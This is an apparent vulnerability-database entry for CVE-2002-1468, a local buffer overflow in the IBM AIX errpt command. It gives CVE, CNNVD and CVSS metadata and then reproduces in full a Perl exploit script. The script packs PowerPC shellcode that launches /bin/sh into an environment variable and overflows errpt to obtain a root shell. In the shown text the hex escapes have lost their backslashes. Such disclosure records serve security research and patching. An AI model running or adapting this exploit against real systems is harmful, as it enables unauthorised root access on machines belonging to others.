IBM AIX ERRPT Local Buffer Overflow Vulnerability


Vulnerability ID: 1107276 Vulnerability type: Buffer overflow
Published: 2003-04-16 Updated: 2005-05-13
CVE ID: CVE-2002-1468
CNNVD-ID: CNNVD-200304-131
Platform: AIX CVSS score: 10.0
|Vulnerability source
https://www.exploit-db.com/exploits/21904
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200304-131
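|Vulnerability details
A buffer overflow vulnerability exists in errpt in AIX 4.3.3. A local user can execute arbitrary code with root privileges.
|Exploit (EXP)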
source: http://www.securityfocus.com/bid/5885/info

The IBM AIX errpt command is prone to a locally exploitable buffer overflow condition. It is possible to exploit this condition to execute arbitrary attacker-supplied instructions with root privileges.

#!/usr/bin/perl
# FileName: x_errpt_aix5.pl
# Exploit command errpt for Aix5L to get a root shell.
# Tested  : on Aix5.1
# Author  : [email protected]
# Site    : www.xfocus.org   www.xfocus.net
# Date    : 2003-4-16
# Announce: use as your owner risk!

$BUFF="A". "x7cxa5x2ax79"x500;

#shellcode from lsd-pl and modified by watercloud 2003-4 for Aix5L
$BUFF.="x7ex94xa2x79x40x82xffxfdx7exa8x02xa6x3axb5x01x40";
$BUFF.="x88x55xfexe0x7ex83xa3x78x3axd5xfexe4x7exc8x03xa6";
$BUFF.="x4cxc6x33x42x44xffxffx02xb6x05xffxffx7ex94xa2x79";
$BUFF.="x7ex84xa3x78x40x82xffxfdx7exa8x02xa6x3axb5x01x40";
$BUFF.="x88x55xfexe0x7ex83xa3x78x3axd5xfexe4x7exc8x03xa6";
$BUFF.="x4cxc6x33x42x44xffxffx02xb7x05xffxffx38x75xffx04";
$BUFF.="x38x95xffx0cx7ex85xa3x78x90x75xffx0cx92x95xffx10";
$BUFF.="x88x55xfexe1x9ax95xffx0bx4bxffxffxd8/bin/sh";

%ENV=(); $ENV{CC}=$BUFF;

exec "/usr/bin/errpt","-T","A"."x2fxf2x2ax40"x1320;
#EOF
|References

Source: AIXAPAR
Name: IY31997
Link: http://archives.neohapsis.com/archives/aix/2002-q3/0007.html
Source: BID
Name: 5885
Link: http://www.securityfocus.com/bid/5885
